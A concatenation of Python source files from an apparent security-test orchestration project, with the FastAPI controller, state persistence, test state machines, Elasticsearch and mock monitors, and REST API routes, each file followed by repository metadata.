raise NotFoundException(f"TestSuite with id {id} not found")
def create_test_suite(self, test_suite: APIOjbects.NewTestSuite) -> TestSuite:
new_test_suite = TestSuite(**test_suite.__dict__)
if new_test_suite.id in self._test_suites:
raise DuplicateException(f"TestSuite with id {new_test_suite.id} already exists")
self.validate_test_suite_relationships(new_test_suite)
self._test_suites[new_test_suite.id] = new_test_suite
return new_test_suite
def update_test_suite(self, id: UUID, test_suite: APIOjbects.UpdatedTestSuite) -> TestSuite:
if id in self._test_suites:
updated = self._test_suites[id].clone_with_updates(test_suite)
self.validate_test_suite_relationships(updated)
self._test_suites[id] = updated
return self._test_suites[id]
else:
raise NotFoundException(f"TestSuite with id {id} not found")
def delete_test_suite(self, id: UUID) -> None:
if id in self._test_suites:
self._test_suites.pop(id)
else:
raise NotFoundException(f"TestSuite with id {id} not found")
def get_test_configurations_in_suite(self, suite_id: UUID) -> List[TestConfiguration]:
return [test for test in self._test_configurations.values() if test.id in self._test_suites[suite_id].test_configuration_ids]
def get_uncategorized_test_configurations(self) -> List[TestConfiguration]:
return [test for test in self._test_configurations.values() if not any(test.id in test_suite.test_configuration_ids for test_suite in self._test_suites.values())]
#endregion TestSuite Management
class PersistentInMemoryState(InMemoryState):
def __init__(self):
super().__init__()
self.load()
asyncio.get_running_loop().create_task(self.ongoing_save())
async def ongoing_save(self):
while True:
await asyncio.sleep(10)
await self.save()
async def save(self):
with open(app_settings.state_file, "wb") as f:
pickle.dump(self, f)
def load(self):
try:
with open(app_settings.state_file, "rb") as f:
state = pickle.load(f)
self.__dict__.update(state.__dict__)
except:
pass
class ControllerStateFactory:
_state: ControllerState = None
_state_type: type = InMemoryState
@classmethod
def set_state_type(cls, state_type: type):
cls._state_type = state_type
@classmethod
def get_state(cls) -> ControllerState:
if not cls._state:
cls._state = cls._state_type()
return cls._state | 32,304 | Python | .py | 646 | 40.619195 | 170 | 0.685913 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,543 | settings.py | loredous_tommyknocker/src/python/controller/settings.py | from pydantic_settings import BaseSettings
class Settings(BaseSettings):
debug: bool = False
seed_for_testing: bool = False
state_type: str = "memory"
state_file: str = "state.pkl"
statemachines_file: str = "statemachines.pkl"
file_state_path: str = "."
app_settings = Settings() | 308 | Python | .py | 9 | 30.111111 | 50 | 0.703704 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,544 | statemachines.py | loredous_tommyknocker/src/python/controller/statemachines.py | import datetime
from typing import Any, List
from statemachine import State, StateMachine
from controller.state import ControllerStateFactory
from shared.models.objects import Test, TestConfiguration, ResponseExpectation, TestComponentStatus
from shared.models.enums import ComponentStatus, ComponentType, TestStatus
from controller.response import ExpectedResponse
from shared.models.apiobjects import UpdatedTestComponentStatus
from logging import getLogger
class TestStateMachine(StateMachine):
pending = State(initial=True)
knocking = State()
checking = State()
success = State(final=True)
failure = State(final=True)
error = State(final=True)
test: Test = None
expected_responses: List[ExpectedResponse]
cycle = (pending.to(knocking, cond="picked_up") | knocking.to(checking, cond="knocking_complete") | checking.to(success, cond="check_successful"))
failed = (checking.to(failure),)
errored = (pending.to(error) | knocking.to(error) | checking.to(error))
def __init__(self, test: Test, model: Any = None, state_field: str = "state", start_value: Any = None, rtc: bool = True, allow_event_without_transition: bool = False):
super().__init__(model, state_field, start_value, rtc, allow_event_without_transition)
self.logger = getLogger(__name__)
self.expected_responses = []
self.test = test
self.controller_state = ControllerStateFactory.get_state()
def picked_up(self) -> bool:
config = self.controller_state.get_test_configuration_by_id(self.test.configuration_id)
tc_statuses = [self.controller_state.get_test_component_status_by_id(component_id) for component_id in self.test.component_status_ids]
if len(tc_statuses) == len(config.knock_ids):
return True
def on_enter_knocking(self):
self.test = self.controller_state.get_test_by_id(self.test.id)
self.test.started = datetime.datetime.utcnow()
self.test.status = TestStatus.KNOCKING
self.controller_state.update_test(self.test.id, self.test)
def knocking_complete(self) -> bool:
tc_statuses = [self.controller_state.get_test_component_status_by_id(component_id) for component_id in self.test.component_status_ids]
test_config = self.controller_state.get_test_configuration_by_id(self.test.configuration_id)
if len(tc_statuses) == len(test_config.knock_ids):
return all(tc_status.status == ComponentStatus.SUCCESS for tc_status in tc_statuses)
def on_enter_checking(self):
self.test = self.controller_state.get_test_by_id(self.test.id)
self.test.status = TestStatus.CHECKING
self.controller_state.update_test(self.test.id, self.test)
self.populate_response_testcomponents()
def populate_response_testcomponents(self):
self.test = self.controller_state.get_test_by_id(self.test.id)
config = self.controller_state.get_test_configuration_by_id(self.test.configuration_id)
response_expectations = [self.controller_state.get_response_expectation_by_id(response_expectation) for response_expectation in config.response_expectation_ids]
for expectation in response_expectations:
component_status = TestComponentStatus(component_id=expectation.response_id, component_type=ComponentType.RESPONSE, status=ComponentStatus.PENDING)
self.controller_state.create_test_component_status(component_status)
self.controller_state.add_test_component_status(self.test.id, component_status.id)
self.expected_responses.append(ExpectedResponse(expectation))
def check_successful(self) -> bool:
self.check_responses()
self.test = self.controller_state.get_test_by_id(self.test.id)
tc_statuses = [self.controller_state.get_test_component_status_by_id(component_id) for component_id in self.test.component_status_ids]
if all(tc_status.status == ComponentStatus.SUCCESS for tc_status in tc_statuses):
self.test.ended = datetime.datetime.utcnow()
self.test.status = TestStatus.SUCCESS
elif any(tc_status.status == ComponentStatus.ERROR for tc_status in tc_statuses):
self.send("errored")
self.test.ended = datetime.datetime.utcnow()
self.test.status = TestStatus.ERROR
elif any(tc_status.status == ComponentStatus.FAILURE for tc_status in tc_statuses):
self.send("failed")
self.test.ended = datetime.datetime.utcnow()
self.test.status = TestStatus.FAILURE
self.controller_state.update_test(self.test.id, self.test)
return self.test.status == TestStatus.SUCCESS
def check_responses(self):
component_statuses = self.controller_state.get_test_component_statuses_by_test_id(self.test.id)
for expected_response in self.expected_responses:
try:
component_status = [status for status in component_statuses if status.component_id == expected_response.expectation.response_id].pop()
if component_status.status not in [ComponentStatus.FAILURE, ComponentStatus.SUCCESS, ComponentStatus.ERROR]:
status = UpdatedTestComponentStatus(status=ComponentStatus.ERROR)
try:
if expected_response.check_response():
status.status = ComponentStatus.SUCCESS
elif expected_response.response.timeout < (datetime.datetime.utcnow() - self.test.started).seconds:
status.status = ComponentStatus.FAILURE
except Exception as e:
self.logger.exception("Exception occurred while checking response", e)
status.status = ComponentStatus.ERROR
self.controller_state.update_test_component_status(component_status.id, status)
except IndexError:
self.logger.error(f"Expected response {expected_response.response.id} not found in component statuses")
pass | 6,112 | Python | .py | 92 | 55.98913 | 171 | 0.700619 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,545 | response.py | loredous_tommyknocker/src/python/controller/response.py | from dataclasses import dataclass
from typing import Optional
from shared.models.objects import Response, Monitor, ResponseExpectation
from controller.monitor import MockMonitor, ElasticsearchMonitor
from controller.state import ControllerStateFactory
class ExpectedResponse():
response: ResponseExpectation
def __init__(self, expectation: ResponseExpectation):
self.expectation = expectation
self.state = ControllerStateFactory.get_state()
def check_response(self) -> bool:
response = self.state.get_response_by_id(self.expectation.response_id)
monitor = self.state.get_monitor_by_id(response.monitor_id)
if monitor.type == "elasticsearch":
monitor = ElasticsearchMonitor(monitor)
elif monitor.type == "mock":
monitor = MockMonitor(monitor)
else:
raise ValueError(f"Monitor type {monitor.type} is not supported")
results = monitor.query_monitor(**response.monitor_parameters)
return bool(results) == self.expectation.expected
| 1,068 | Python | .py | 21 | 43.142857 | 78 | 0.735867 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,546 | controller.py | loredous_tommyknocker/src/python/controller/controller.py | import asyncio
from datetime import datetime
import logging
from uuid import UUID
from fastapi import FastAPI, APIRouter
from fastapi.concurrency import asynccontextmanager
from controller.state import ControllerStateFactory, InMemoryState, PersistentInMemoryState
from controller.v1api import v1APIRouter
from shared.models.objects import Knocker, Monitor, ResponseExpectation, Runner, Result, ResultType, Knock, TestConfiguration, Test, TestConfiguration, ResultType, Response
from fastapi_utils.tasks import repeat_every
from controller.dependency import ActiveStateMachinesFactory
from controller.settings import app_settings
def seed_data():
controller_state = ControllerStateFactory.get_state()
active_state_machines = ActiveStateMachinesFactory.get_active_state_machines()
knocker = controller_state.create_knocker(Knocker(name="Test Knocker", description="A pre-seeded knocker for testing", last_seen=datetime.now(), id=UUID("00000000-0000-0000-0000-000000000001")))
runner = controller_state.create_runner(Runner(name="Debian Test Runner", description="A runner for testing, based on the latest Debian image", image_name="debian", image_tag="latest"))
result_exit_code = controller_state.create_result(Result(type=ResultType.EXIT_CODE, value="0"))
result_output = controller_state.create_result(Result(type=ResultType.PRESENT_IN_OUTPUT, value="Hello World!"))
knock = controller_state.create_knock(Knock(name="Test Knock", runner_id=runner.id, command="echo 'Hello World!'", description="A pre-seeded knock for testing", result_ids=[result_exit_code.id, result_output.id]))
monitor = controller_state.create_monitor(Monitor(name="Test Monitor", description="A pre-seeded monitor for testing", type="mock"))
response = controller_state.create_response(Response(name="Test Response", description="A pre-seeded response for testing", monitor_id=monitor.id, monitor_parameters={"response": True}))
response_expectation = controller_state.create_response_expectation(ResponseExpectation(response_id=response.id, expected=True, timeout=90))
test_configuration = controller_state.create_test_configuration(TestConfiguration(name="Test Configuration", description="A pre-seeded test configuration for testing", knock_ids=[knock.id], response_expectation_ids=[response_expectation.id]))
test = controller_state.create_test(Test(configuration_id=test_configuration.id, knocker_id=knocker.id))
active_state_machines.add_state_machine_for_test(test)
if app_settings.debug:
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
active_state_machines = ActiveStateMachinesFactory.get_active_state_machines()
async def update_statemachines():
await asyncio.sleep(5)
while True:
logger.debug("Cycling state machines")
await active_state_machines.cycle_state_machines()
await asyncio.sleep(5)
@asynccontextmanager
async def lifespan(app: FastAPI):
update_task = asyncio.get_running_loop().create_task(update_statemachines())
set_state_type(app_settings.state_type)
controller_state = ControllerStateFactory.get_state()
if controller_state.list_knockers() == [] and app_settings.seed_for_testing:
seed_data()
yield
update_task.cancel()
def set_state_type(state_type: str):
match app_settings.state_type:
case "memory":
ControllerStateFactory.set_state_type(InMemoryState)
case "file":
ControllerStateFactory.set_state_type(PersistentInMemoryState)
case _:
ControllerStateFactory.set_state_type(InMemoryState)
api = FastAPI(lifespan=lifespan)
api.include_router(v1APIRouter)
| 3,686 | Python | .py | 55 | 62.436364 | 246 | 0.780818 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,547 | v1api.py | loredous_tommyknocker/src/python/controller/v1api.py | from dataclasses import asdict
import datetime
from typing import List
from uuid import UUID
from fastapi import APIRouter, BackgroundTasks
from controller.state import ControllerState, ControllerStateFactory
import shared.models.objects as StateObjects
import shared.models.apiobjects as APIObjects
from shared.models.enums import ComponentStatus, TestStatus
from controller.dependency import ActiveStateMachinesDependency, ControllerStateDependency
v1APIRouter = APIRouter(prefix="/api/v1")
#controller_state: ControllerState = ControllerStateFactory.get_state()
#region Knocker Management
@v1APIRouter.get("/knockers", tags=["Knockers"])
def list_knockers(controller_state: ControllerStateDependency) -> List[StateObjects.Knocker]:
return controller_state.list_knockers()
@v1APIRouter.get("/knockers/{id}", tags=["Knockers"])
def get_knocker_by_id(id: UUID, controller_state: ControllerStateDependency) -> StateObjects.Knocker:
return controller_state.get_knocker_by_id(id)
@v1APIRouter.post("/knockers", tags=["Knockers"])
def create_knocker(knocker: APIObjects.NewKnocker, controller_state: ControllerStateDependency) -> StateObjects.Knocker:
return controller_state.create_knocker(StateObjects.Knocker(**asdict(knocker)))
@v1APIRouter.put("/knockers/{id}", tags=["Knockers"])
def update_knocker(id: UUID, controller_state: ControllerStateDependency, knocker: APIObjects.UpdatedKnocker) -> StateObjects.Knocker:
return controller_state.update_knocker(id, knocker)
@v1APIRouter.delete("/knockers/{id}", tags=["Knockers"])
def delete_knocker(id: UUID, controller_state: ControllerStateDependency) -> None:
controller_state.delete_knocker(id)
@v1APIRouter.post("/knockers/{id}/checkin", tags=["Knockers"])
def knocker_checkin(id: UUID, controller_state: ControllerStateDependency) -> List[StateObjects.Test]:
controller_state.knocker_checkin(id)
return controller_state.get_tests_by_knocker_id(id)
#endregion Knocker Management
#region Knock Management
@v1APIRouter.get("/knocks", tags=["Knocks"])
def list_knocks(controller_state: ControllerStateDependency) -> List[StateObjects.Knock]:
return controller_state.list_knocks()
@v1APIRouter.get("/knocks/{id}", tags=["Knocks"])
def get_knock_by_id(controller_state: ControllerStateDependency, id: UUID) -> StateObjects.Knock:
return controller_state.get_knock_by_id(id)
@v1APIRouter.post("/knocks", tags=["Knocks"])
def create_knock(controller_state: ControllerStateDependency, knock: APIObjects.NewKnock) -> StateObjects.Knock:
return controller_state.create_knock(StateObjects.Knock(**asdict(knock)))
@v1APIRouter.put("/knocks/{id}", tags=["Knocks"])
def update_knock(controller_state: ControllerStateDependency, id: UUID, knock: APIObjects.UpdatedKnock) -> StateObjects.Knock:
return controller_state.update_knock(id, knock)
@v1APIRouter.delete("/knocks/{id}", tags=["Knocks"])
def delete_knock(controller_state: ControllerStateDependency, id: UUID) -> None:
controller_state.delete_knock(id)
#endregion Knock Management
#region Runner Management
@v1APIRouter.get("/runners", tags=["Runners"])
def list_runners(controller_state: ControllerStateDependency, ) -> List[StateObjects.Runner]:
return controller_state.list_runners()
@v1APIRouter.get("/runners/{id}", tags=["Runners"])
def get_runner_by_id(controller_state: ControllerStateDependency, id: UUID) -> StateObjects.Runner:
return controller_state.get_runner_by_id(id)
@v1APIRouter.post("/runners", tags=["Runners"])
def create_runner(controller_state: ControllerStateDependency, runner: APIObjects.NewRunner) -> StateObjects.Runner:
return controller_state.create_runner(StateObjects.Runner(**asdict(runner)))
@v1APIRouter.put("/runners/{id}", tags=["Runners"])
def update_runner(controller_state: ControllerStateDependency, id: UUID, runner: APIObjects.UpdatedRunner) -> StateObjects.Runner:
return controller_state.update_runner(id, runner)
@v1APIRouter.delete("/runners/{id}", tags=["Runners"])
def delete_runner(controller_state: ControllerStateDependency, id: UUID) -> None:
controller_state.delete_runner(id)
#endregion Runner Management
#region Result Management
@v1APIRouter.get("/results", tags=["Results"])
def list_results(controller_state: ControllerStateDependency, ) -> List[StateObjects.Result]:
return controller_state.list_results()
@v1APIRouter.get("/results/{id}", tags=["Results"])
def get_result_by_id(controller_state: ControllerStateDependency, id: UUID) -> StateObjects.Result:
return controller_state.get_result_by_id(id)
@v1APIRouter.post("/results", tags=["Results"])
def create_result(controller_state: ControllerStateDependency, result: APIObjects.NewResult) -> StateObjects.Result:
return controller_state.create_result(StateObjects.Result(**asdict(result)))
@v1APIRouter.put("/results/{id}", tags=["Results"])
def update_result(controller_state: ControllerStateDependency, id: UUID, result: APIObjects.UpdatedResult) -> StateObjects.Result:
return controller_state.update_result(id, result)
@v1APIRouter.delete("/results/{id}", tags=["Results"])
def delete_result(controller_state: ControllerStateDependency, id: UUID) -> None:
controller_state.delete_result(id)
#endregion Result Management
#region Monitor Management
@v1APIRouter.get("/monitors", tags=["Monitors"])
def list_monitors(controller_state: ControllerStateDependency, ) -> List[StateObjects.Monitor]:
return controller_state.list_monitors()
@v1APIRouter.get("/monitors/{id}", tags=["Monitors"])
def get_monitor_by_id(controller_state: ControllerStateDependency, id: UUID) -> StateObjects.Monitor:
return controller_state.get_monitor_by_id(id)
@v1APIRouter.post("/monitors", tags=["Monitors"])
def create_monitor(controller_state: ControllerStateDependency, monitor: APIObjects.NewMonitor) -> StateObjects.Monitor:
return controller_state.create_monitor(StateObjects.Monitor(**asdict(monitor)))
@v1APIRouter.put("/monitors/{id}", tags=["Monitors"])
def update_monitor(controller_state: ControllerStateDependency, id: UUID, monitor: APIObjects.UpdatedMonitor) -> StateObjects.Monitor:
return controller_state.update_monitor(id, monitor)
@v1APIRouter.delete("/monitors/{id}", tags=["Monitors"])
def delete_monitor(controller_state: ControllerStateDependency, id: UUID) -> None:
controller_state.delete_monitor(id)
#endregion Monitor Management
#region Response Management
@v1APIRouter.get("/responses", tags=["Responses"])
def list_responses(controller_state: ControllerStateDependency, ) -> List[StateObjects.Response]:
return controller_state.list_responses()
@v1APIRouter.get("/responses/{id}", tags=["Responses"])
def get_response_by_id(controller_state: ControllerStateDependency, id: UUID) -> StateObjects.Response:
return controller_state.get_response_by_id(id)
@v1APIRouter.post("/responses", tags=["Responses"])
def create_response(controller_state: ControllerStateDependency, response: APIObjects.NewResponse) -> StateObjects.Response:
return controller_state.create_response(StateObjects.Response(**asdict(response)))
@v1APIRouter.put("/responses/{id}", tags=["Responses"])
def update_response(controller_state: ControllerStateDependency, id: UUID, response: APIObjects.UpdatedResponse) -> StateObjects.Response:
return controller_state.update_response(id, response)
@v1APIRouter.delete("/responses/{id}", tags=["Responses"])
def delete_response(controller_state: ControllerStateDependency, id: UUID) -> None:
controller_state.delete_response(id)
#endregion Response Management
#region ResponseExpectation Management
@v1APIRouter.get("/response-expectations", tags=["ResponseExpectations"])
def list_response_expectations(controller_state: ControllerStateDependency, ) -> List[StateObjects.ResponseExpectation]:
return controller_state.list_response_expectations()
@v1APIRouter.get("/response-expectations/{id}", tags=["ResponseExpectations"])
def get_response_expectation_by_id(controller_state: ControllerStateDependency, id: UUID) -> StateObjects.ResponseExpectation:
return controller_state.get_response_expectation_by_id(id)
@v1APIRouter.post("/response-expectations", tags=["ResponseExpectations"])
def create_response_expectation(controller_state: ControllerStateDependency, response_expectation: APIObjects.NewResponseExpectation) -> StateObjects.ResponseExpectation:
return controller_state.create_response_expectation(StateObjects.ResponseExpectation(**asdict(response_expectation)))
@v1APIRouter.put("/response-expectations/{id}", tags=["ResponseExpectations"])
def update_response_expectation(controller_state: ControllerStateDependency, id: UUID, response_expectation: APIObjects.UpdatedResponseExpectation) -> StateObjects.ResponseExpectation:
return controller_state.update_response_expectation(id, response_expectation)
@v1APIRouter.delete("/response-expectations/{id}", tags=["ResponseExpectations"])
def delete_response_expectation(controller_state: ControllerStateDependency, id: UUID) -> None:
controller_state.delete_response_expectation(id)
#endregion ResponseExpectation Management
#region TestConfiguration Management
@v1APIRouter.get("/test-configurations", tags=["TestConfigurations"])
def list_test_configurations(controller_state: ControllerStateDependency, ) -> List[StateObjects.TestConfiguration]:
return controller_state.list_test_configurations()
@v1APIRouter.get("/test-configurations/{id}", tags=["TestConfigurations"])
def get_test_configuration_by_id(controller_state: ControllerStateDependency, id: UUID) -> StateObjects.TestConfiguration:
return controller_state.get_test_configuration_by_id(id)
@v1APIRouter.post("/test-configurations", tags=["TestConfigurations"])
def create_test_configuration(controller_state: ControllerStateDependency, test_configuration: APIObjects.NewTestConfiguration) -> StateObjects.TestConfiguration:
return controller_state.create_test_configuration(StateObjects.TestConfiguration(**asdict(test_configuration)))
@v1APIRouter.put("/test-configurations/{id}", tags=["TestConfigurations"])
def update_test_configuration(controller_state: ControllerStateDependency, id: UUID, test_configuration: APIObjects.UpdatedTestConfiguration) -> StateObjects.TestConfiguration:
return controller_state.update_test_configuration(id, test_configuration)
@v1APIRouter.delete("/test-configurations/{id}", tags=["TestConfigurations"])
def delete_test_configuration(controller_state: ControllerStateDependency, id: UUID) -> None:
controller_state.delete_test_configuration(id)
@v1APIRouter.get("/test-configurations/{id}/runs", tags=["TestConfigurations"])
def get_test_configuration_runs(controller_state: ControllerStateDependency, id: UUID, count: int = 5) -> List[StateObjects.Test]:
return controller_state.get_latest_runs_by_test_configuration_id(id, count)
#endregion TestConfiguration Management
#region TestComponentStatus Management
@v1APIRouter.get("/test-component-statuses", tags=["TestComponentStatuses"])
def list_test_component_statuses(controller_state: ControllerStateDependency, ) -> List[StateObjects.TestComponentStatus]:
return controller_state.list_test_component_statuses()
@v1APIRouter.get("/test-component-statuses/{id}", tags=["TestComponentStatuses"])
def get_test_component_status_by_id(controller_state: ControllerStateDependency, id: UUID) -> StateObjects.TestComponentStatus:
return controller_state.get_test_component_status_by_id(id)
@v1APIRouter.post("/test-component-statuses", tags=["TestComponentStatuses"])
def create_test_component_status(controller_state: ControllerStateDependency, test_component_status: APIObjects.NewTestComponentStatus) -> StateObjects.TestComponentStatus:
return controller_state.create_test_component_status(StateObjects.TestComponentStatus(**asdict(test_component_status)))
@v1APIRouter.put("/test-component-statuses/{id}", tags=["TestComponentStatuses"])
def update_test_component_status(controller_state: ControllerStateDependency, id: UUID, test_component_status: APIObjects.UpdatedTestComponentStatus) -> StateObjects.TestComponentStatus:
return controller_state.update_test_component_status(id, test_component_status)
@v1APIRouter.delete("/test-component-statuses/{id}", tags=["TestComponentStatuses"])
def delete_test_component_status(controller_state: ControllerStateDependency, id: UUID) -> None:
controller_state.delete_test_component_status(id)
@v1APIRouter.get("/test-component-statuses/by_test/{test_id}", tags=["TestComponentStatuses"])
def get_test_component_statuses_by_test_id(controller_state: ControllerStateDependency, test_id: UUID) -> List[StateObjects.TestComponentStatus]:
return controller_state.get_test_component_statuses_by_test_id(test_id)
#endregion TestComponentStatus Management
#region Test Management
@v1APIRouter.get("/tests", tags=["Tests"])
def list_tests(controller_state: ControllerStateDependency, ) -> List[StateObjects.Test]:
return controller_state.list_tests()
@v1APIRouter.get("/tests/{id}", tags=["Tests"])
def get_test_by_id(controller_state: ControllerStateDependency, id: UUID) -> StateObjects.Test:
return controller_state.get_test_by_id(id)
@v1APIRouter.post("/tests", tags=["Tests"])
def create_test(controller_state: ControllerStateDependency, active_state_machines: ActiveStateMachinesDependency, test: APIObjects.NewTest) -> StateObjects.Test:
new_test = controller_state.create_test(StateObjects.Test(**asdict(test)))
active_state_machines.add_state_machine_for_test(new_test)
return new_test
@v1APIRouter.delete("/tests/{id}", tags=["Tests"])
def delete_test(controller_state: ControllerStateDependency, active_state_machines: ActiveStateMachinesDependency, id: UUID) -> None:
controller_state.delete_test(id)
try:
active_state_machines.remove_state_machine(id)
except:
pass
@v1APIRouter.put("/tests/{id}/add_component_status/{status_id}", tags=["Tests"])
def add_test_component_status(controller_state: ControllerStateDependency, id: UUID, status_id: UUID) -> StateObjects.Test:
return controller_state.add_test_component_status(id, status_id)
@v1APIRouter.get("/tests/by_status/{status}", tags=["Tests"])
def get_tests_by_status(controller_state: ControllerStateDependency, status: TestStatus) -> List[StateObjects.Test]:
return controller_state.get_tests_by_status(status)
@v1APIRouter.get("/tests/running/", tags=["Tests"])
def get_running_tests(controller_state: ControllerStateDependency) -> List[StateObjects.Test]:
return controller_state.get_running_tests()
@v1APIRouter.get("/tests/complete/", tags=["Tests"])
def get_complete_tests(controller_state: ControllerStateDependency) -> List[StateObjects.Test]:
return controller_state.get_completed_tests()
#endregion Test Management
#region TestSuite Management
@v1APIRouter.get("/test-suites", tags=["TestSuites"])
def list_test_suites(controller_state: ControllerStateDependency, ) -> List[StateObjects.TestSuite]:
return controller_state.list_test_suites()
@v1APIRouter.get("/test-suites/{id}", tags=["TestSuites"])
def get_test_suite_by_id(controller_state: ControllerStateDependency, id: UUID) -> StateObjects.TestSuite:
return controller_state.get_test_suite_by_id(id)
@v1APIRouter.post("/test-suites", tags=["TestSuites"])
def create_test_suite(controller_state: ControllerStateDependency, test_suite: APIObjects.NewTestSuite) -> StateObjects.TestSuite:
return controller_state.create_test_suite(StateObjects.TestSuite(**asdict(test_suite)))
@v1APIRouter.put("/test-suites/{id}", tags=["TestSuites"])
def update_test_suite(controller_state: ControllerStateDependency, id: UUID, test_suite: APIObjects.UpdatedTestSuite) -> StateObjects.TestSuite:
return controller_state.update_test_suite(id, test_suite)
@v1APIRouter.delete("/test-suites/{id}", tags=["TestSuites"])
def delete_test_suite(controller_state: ControllerStateDependency, id: UUID) -> None:
controller_state.delete_test_suite(id)
@v1APIRouter.get("/test-suites/{id}/tests", tags=["TestSuites"])
def get_all_tests_configurations_in_suite(controller_state: ControllerStateDependency, id: UUID) -> List[StateObjects.TestConfiguration]:
return controller_state.get_test_configurations_in_suite(id)
@v1APIRouter.get("/test-suites/uncategorized/", tags=["TestSuites"])
def get_uncategorized_test_configurations(controller_state: ControllerStateDependency) -> List[StateObjects.TestConfiguration]:
return controller_state.get_uncategorized_test_configurations()
#endregion TestSuite Management
| 16,582 | Python | .py | 230 | 69.404348 | 186 | 0.798843 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,548 | monitor.py | loredous_tommyknocker/src/python/controller/monitor.py | from dataclasses import dataclass
import json
import logging
from typing import List, Optional
from shared.models.objects import Monitor, Response
from shared.models.enums import MonitorType
from abc import ABC, abstractmethod
from elasticsearch import Elasticsearch
class MonitorBase(ABC):
monitor: Monitor
def initialize_logging(self):
self.logger = logging.getLogger(f"{self.monitor.name} Monitor")
@abstractmethod
def check_monitor_status(self) -> bool:
pass
@abstractmethod
def query_monitor(self, **kwargs) -> List:
pass
class MockMonitor(MonitorBase):
def __init__(self, monitor: Monitor):
if monitor.type != MonitorType.MOCK:
raise ValueError("Monitor type must be 'mock' to create MockMonitor")
self.monitor = monitor
def check_monitor_status(self) -> bool:
# Mock monitor always returns True
return self.monitor.config.get("response", True)
def query_monitor(self, **kwargs):
return json.loads(self.monitor.config.get("query_return", "['Mock return data']"))
class ElasticsearchMonitor(MonitorBase):
def __init__(self, monitor: Monitor):
if monitor.type != MonitorType.ELASTICSEARCH:
raise ValueError("Monitor type must be 'elasticsearch' to create ElasticsearchMonitor")
self.monitor = monitor
try:
self.host = monitor.config["host"]
self.port = monitor.config.get("port", 9200)
self.username = monitor.config["username"]
self.password = monitor.config["password"]
self.verify_certs = monitor.config.get("verify_certs", True)
self.elasticsearch = Elasticsearch([f"{self.host}:{self.port}"], http_auth=(self.username, self.password), verify_certs=self.verify_certs) ## TODO: Add API key support
except KeyError as e:
raise ValueError(f"Monitor is missing required field {e}")
def check_monitor_status(self) -> bool:
# Check if Elasticsearch is running
return self.elasticsearch.ping()
def query_monitor(self, **kwargs):
try:
index = kwargs["index"]
query = kwargs["query"]
result = self.elasticsearch.search(index=index, body=query)
if result.get("hits", {}).get('total', 0) != 0:
return result["hits"]["hits"]
else:
return []
except Exception as e:
self.logger.exception("Exception occurred while querying Elasticsearch",e) | 2,558 | Python | .py | 56 | 37.125 | 179 | 0.664775 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,549 | dependency.py | loredous_tommyknocker/src/python/controller/dependency.py | import logging
from typing import Annotated, Dict
from uuid import UUID
from statemachine.exceptions import TransitionNotAllowed
from fastapi import Depends
from controller.statemachines import TestStateMachine
from controller.state import ControllerState, ControllerStateFactory
from shared.models.objects import Test
import pickle
from os import path
from controller.settings import app_settings
class ActiveStateMachines:
_active_state_machines: Dict[UUID, TestStateMachine] = {}
_persist_path = path.join(app_settings.file_state_path, app_settings.statemachines_file)
def __init__(self):
self.logger = logging.getLogger(__name__)
def add_state_machine_for_test(self, test: Test) -> TestStateMachine:
self.logger.debug(f"Adding state machine for test {test.id}")
state_machine = TestStateMachine(test)
self._active_state_machines[test.id] = state_machine
return state_machine
def get_state_machine(self, test_id: UUID) -> TestStateMachine:
return self._active_state_machines.get(test_id, None)
def remove_state_machine(self, test_id: UUID) -> None:
self.logger.debug(f"Removing state machine for test {test_id}")
self._active_state_machines.pop(test_id, None)
def persist_to_file(self):
with open(self._persist_path, 'wb') as f:
pickle.dump(self, f)
def load_from_file(self):
try:
with open(self._persist_path, "rb") as f:
state = pickle.load(f)
self.__dict__.update(state.__dict__)
except:
pass
async def cycle_state_machines(self) -> None:
to_remove = []
for test_id, state_machine in self._active_state_machines.items():
self.logger.debug(f"Cycling state machine for test {test_id}")
try:
await state_machine.cycle()
self.logger.debug(f"Cycled state machine for test {test_id} to {state_machine.current_state}")
except TransitionNotAllowed as e:
self.logger.debug(f"Cycle not allowed for {test_id} in {state_machine.current_state}")
continue
except Exception as ex:
self.logger.exception(f"Error cycling state machine for test {test_id}: {ex}")
if state_machine.current_state.final:
to_remove.append(test_id)
for test_id in to_remove:
try:
self.logger.debug(f"Removing state machine for test {test_id} as it is in a final state: {self._active_state_machines[test_id].current_state}")
self.remove_state_machine(test_id)
except Exception as ex:
self.logger.exception(f"Error removing state machine for test {test_id}: {ex}")
self.persist_to_file()
class ActiveStateMachinesFactory:
_active_state_machines: ActiveStateMachines = None
@classmethod
def get_active_state_machines(cls) -> ActiveStateMachines:
if not cls._active_state_machines:
cls._active_state_machines = ActiveStateMachines()
cls._active_state_machines.load_from_file()
return cls._active_state_machines
ActiveStateMachinesDependency = Annotated[ActiveStateMachines, Depends(ActiveStateMachinesFactory.get_active_state_machines)]
ControllerStateDependency = Annotated[ControllerState, Depends(ControllerStateFactory.get_state)] | 3,421 | Python | .py | 67 | 42.238806 | 159 | 0.683263 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,550 | test_v1Api.py | loredous_tommyknocker/src/python/tests/test_v1Api.py | from uuid import UUID
from fastapi.testclient import TestClient
from controller.controller import api
import pytest
from controller.state import ControllerStateFactory
from shared.models.objects import Knocker
@pytest.fixture()
def client():
with TestClient(api) as client:
yield client
class TestV1API:
@classmethod
def setup_class(cls):
state = ControllerStateFactory.get_state()
state._knockers[UUID("00000000-0000-0000-0000-000000000001")] = Knocker(id=UUID("00000000-0000-0000-0000-000000000001"), name="test_knocker", description="test_description")
